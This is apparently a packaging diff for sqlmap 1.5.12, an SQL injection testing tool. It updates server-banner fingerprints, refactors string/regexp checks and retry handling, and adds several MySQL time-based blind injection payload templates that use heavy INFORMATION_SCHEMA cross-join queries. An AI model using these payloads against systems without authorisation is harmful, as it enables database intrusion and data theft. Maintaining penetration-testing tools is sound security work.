New upstream version 1.5.12

COMMITMENT

-GPL Cooperation Commitment
-Version 1.0
-
-Before filing or continuing to prosecute any legal proceeding or claim
-(other than a Defensive Action) arising from termination of a Covered
-License, we commit to extend to the person or entity ('you') accused
-of violating the Covered License the following provisions regarding
-cure and reinstatement, taken from GPL version 3. As used here, the
-term 'this License' refers to the specific Covered License being
-enforced.
-
-    However, if you cease all violation of this License, then your
-    license from a particular copyright holder is reinstated (a)
-    provisionally, unless and until the copyright holder explicitly
-    and finally terminates your license, and (b) permanently, if the
-    copyright holder fails to notify you of the violation by some
-    reasonable means prior to 60 days after the cessation.
-
-    Moreover, your license from a particular copyright holder is
-    reinstated permanently if the copyright holder notifies you of the
-    violation by some reasonable means, this is the first time you
-    have received notice of violation of this License (for any work)
-    from that copyright holder, and you cure the violation prior to 30
-    days after your receipt of the notice.
-
-We intend this Commitment to be irrevocable, and binding and
-enforceable against us and assignees of or successors to our
-copyrights.
-
-Definitions
-
-'Covered License' means the GNU General Public License, version 2
-(GPLv2), the GNU Lesser General Public License, version 2.1
-(LGPLv2.1), or the GNU Library General Public License, version 2
-(LGPLv2), all as published by the Free Software Foundation.
-
-'Defensive Action' means a legal proceeding or claim that We bring
-against you in response to a prior proceeding or claim initiated by
-you or your affiliate.
-
-'We' means each contributor to this repository as of the date of
-inclusion of this file, including subsidiaries of a corporate
-contributor.
-
-This work is available under a Creative Commons Attribution-ShareAlike
-4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).

data/xml/banner/generic.xml

@@ -34,7 +34,7 @@
     <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
 
     <regexp value="Windows.*\b10\.0">
-        <info type="Windows" distrib="2019|2016|10"/>
+        <info type="Windows" distrib="2016|2019|10|11"/>
     </regexp>
 
     <regexp value="Windows.*\b6\.3">

data/xml/banner/server.xml

@@ -163,6 +163,10 @@
         <info type="Linux" distrib="Debian" release="10" codename="buster"/>
     </regexp>
 
+    <regexp value="Apache/2\.4\.48 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="11" codename="bullseye"/>
+    </regexp>
+
     <!-- Apache: Fedora -->
 
     <regexp value="Apache/2\.0\.47 \(Fedora\)">
@@ -315,7 +319,11 @@
     </regexp>
 
     <regexp value="Apache/2\.4\.46 \(Fedora\)">
-        <info type="Linux" distrib="Fedora" release="33"/>
+        <info type="Linux" distrib="Fedora" release="33|34"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.51 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="35"/>
     </regexp>
 
     <!-- Apache: FreeBSD -->
@@ -858,7 +866,7 @@
     </regexp>
 
     <regexp value="Apache/2\.4\.41 \(Ubuntu\)">
-        <info type="Linux" distrib="Ubuntu" release="19.10|20.04" codename="eoan|focal"/>
+        <info type="Linux" distrib="Ubuntu" release="19.10|20.04|20.10" codename="eoan|focal"/>
     </regexp>
 
     <!-- Nginx -->

data/xml/payloads/stacked_queries.xml

@@ -85,7 +85,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>
         <stype>4</stype>
         <level>3</level>
         <risk>2</risk>
@@ -105,7 +105,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
@@ -486,7 +486,7 @@
 
     <test>
         <title>IBM DB2 stacked queries (heavy query - comment)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>3</level>
         <risk>2</risk>
         <clause>1-8</clause>
@@ -506,7 +506,7 @@
 
     <test>
         <title>IBM DB2 stacked queries (heavy query)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
         <clause>1-8</clause>
@@ -607,7 +607,7 @@
 
     <test>
         <title>SAP MaxDB stacked queries (heavy query - comment)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>4</level>
         <risk>2</risk>
         <clause>1-8</clause>
@@ -627,7 +627,7 @@
 
     <test>
         <title>SAP MaxDB stacked queries (heavy query)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
         <clause>1-8</clause>

data/xml/payloads/time_blind.xml

@@ -169,7 +169,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
@@ -189,7 +189,27 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
+        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
@@ -209,7 +229,27 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
+        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
@@ -230,7 +270,28 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query - comment)</title>
+        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
@@ -250,6 +311,27 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
         <stype>5</stype>
@@ -1500,7 +1582,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (heavy queries)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (BENCHMARK)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1519,6 +1601,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL time-based blind - Parameter replace (bool)</title>
         <stype>5</stype>
@@ -1854,7 +1956,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>

doc/CHANGELOG.md

+# Version 1.5 (2021-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
+
 # Version 1.4 (2020-01-01)
 
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)

lib/controller/checks.py

@@ -509,7 +509,7 @@ def checkSqlInjection(place, parameter, value):
                             falseRawResponse = "%s%s" % (falseHeaders, falsePage)
 
                             # Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter)
-                            if not any((kb.negativeLogic, conf.string, conf.notString)):
+                            if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):
                                 try:
                                     ratio = 1.0
                                     seqMatcher = getCurrentThreadData().seqMatcher
@@ -1340,44 +1340,6 @@ def checkStability():
 
     return kb.pageStable
 
-def checkString():
-    if not conf.string:
-        return True
-
-    infoMsg = "testing if the provided string is within the "
-    infoMsg += "target URL page content"
-    logger.info(infoMsg)
-
-    page, headers, _ = Request.queryPage(content=True)
-    rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
-
-    if conf.string not in rawResponse:
-        warnMsg = "you provided '%s' as the string to " % conf.string
-        warnMsg += "match, but such a string is not within the target "
-        warnMsg += "URL raw response, sqlmap will carry on anyway"
-        logger.warn(warnMsg)
-
-    return True
-
-def checkRegexp():
-    if not conf.regexp:
-        return True
-
-    infoMsg = "testing if the provided regular expression matches within "
-    infoMsg += "the target URL page content"
-    logger.info(infoMsg)
-
-    page, headers, _ = Request.queryPage(content=True)
-    rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
-
-    if not re.search(conf.regexp, rawResponse, re.I | re.M):
-        warnMsg = "you provided '%s' as the regular expression " % conf.regexp
-        warnMsg += "which does not have any match within the target URL raw response. sqlmap "
-        warnMsg += "will carry on anyway"
-        logger.warn(warnMsg)
-
-    return True
-
 @stackedmethod
 def checkWaf():
     """
@@ -1542,7 +1504,31 @@ def checkConnection(suppressOutput=False):
 
     try:
         kb.originalPageTime = time.time()
-        Request.queryPage(content=True, noteResponseTime=False)
+        page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
+
+        rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
+
+        if conf.string:
+            infoMsg = "testing if the provided string is within the "
+            infoMsg += "target URL page content"
+            logger.info(infoMsg)
+
+            if conf.string not in rawResponse:
+                warnMsg = "you provided '%s' as the string to " % conf.string
+                warnMsg += "match, but such a string is not within the target "
+                warnMsg += "URL raw response, sqlmap will carry on anyway"
+                logger.warn(warnMsg)
+
+        if conf.regexp:
+            infoMsg = "testing if the provided regular expression matches within "
+            infoMsg += "the target URL page content"
+            logger.info(infoMsg)
+
+            if not re.search(conf.regexp, rawResponse, re.I | re.M):
+                warnMsg = "you provided '%s' as the regular expression " % conf.regexp
+                warnMsg += "which does not have any match within the target URL raw response. sqlmap "
+                warnMsg += "will carry on anyway"
+                logger.warn(warnMsg)
 
         kb.errorIsNone = False
 

lib/controller/controller.py

@@ -16,10 +16,8 @@ from lib.controller.checks import checkConnection
 from lib.controller.checks import checkDynParam
 from lib.controller.checks import checkInternet
 from lib.controller.checks import checkNullConnection
-from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkSqlInjection
 from lib.controller.checks import checkStability
-from lib.controller.checks import checkString
 from lib.controller.checks import checkWaf
 from lib.controller.checks import heuristicCheckSqlInjection
 from lib.core.agent import agent
@@ -434,7 +432,7 @@ def start():
 
             setupTargetEnv()
 
-            if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
+            if not checkConnection(suppressOutput=conf.forms):
                 continue
 
             if conf.rParam and kb.originalPage:

lib/core/common.py

@@ -1028,10 +1028,12 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C
                     sys.stdout.write(stdoutEncode(clearColors(data)), status, contentType)
                 else:
                     sys.stdout.write(stdoutEncode(setColor(data, bold=bold) if coloring else clearColors(data)))
-
-                sys.stdout.flush()
             except IOError:
                 pass
+            except UnicodeEncodeError:
+                sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data)))
+            finally:
+                sys.stdout.flush()
 
             if multiThreadMode:
                 logging._releaseLock()

lib/core/option.py

@@ -2655,6 +2655,15 @@ def _basicOptionValidation():
             errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex))
             raise SqlmapSyntaxException(errMsg)
 
+        if conf.retries == defaults.retries:
+            conf.retries = 5 * conf.retries
+
+            warnMsg = "increasing default value for "
+            warnMsg += "option '--retries' to %d because " % conf.retries
+            warnMsg += "option '--retry-on' was provided"
+            logger.warn(warnMsg)
+
+
     if conf.cookieDel and len(conf.cookieDel):
         errMsg = "option '--cookie-del' should contain a single character (e.g. ';')"
         raise SqlmapSyntaxException(errMsg)

lib/core/settings.py

@@ -20,7 +20,7 @@ from thirdparty import six
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.5.11.0"
+VERSION = "1.5.12.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

lib/request/connect.py

@@ -914,11 +914,6 @@ class Connect(object):
                 warnMsg = "forced retry of the request because of undesired page content"
                 logger.warn(warnMsg)
                 return Connect._retryProxy(**kwargs)
-            else:
-                errMsg = "unable to get the page content not matching "
-                errMsg += "the given regular expression '%s'. Please use as high " % conf.retryOn
-                errMsg += "value for option '--retries' as possible (e.g. 20 or more)"
-                raise SqlmapConnectionException(errMsg)
 
         processResponse(page, responseHeaders, code, status)
 

sqlmap.conf

@@ -161,7 +161,7 @@ timeout = 30
 retries = 3
 
 # Retry request on regexp matching content.
-retries = 3
+retryOn =
 
 # Randomly change value for the given parameter.
 rParam = 

sqlmap.py

@@ -349,6 +349,13 @@ def main():
             logger.critical(errMsg)
             raise SystemExit
 
+        elif "hash_randomization" in excMsg:
+            errMsg = "error occurred at Python interpreter which "
+            errMsg += "is fixed in 2.7.3. Please update accordingly "
+            errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')"
+            logger.critical(errMsg)
+            raise SystemExit
+
         elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")):
             errMsg = "there has been a problem while running the multiprocessing hash cracking. "
             errMsg += "Please rerun with option '--threads=1'"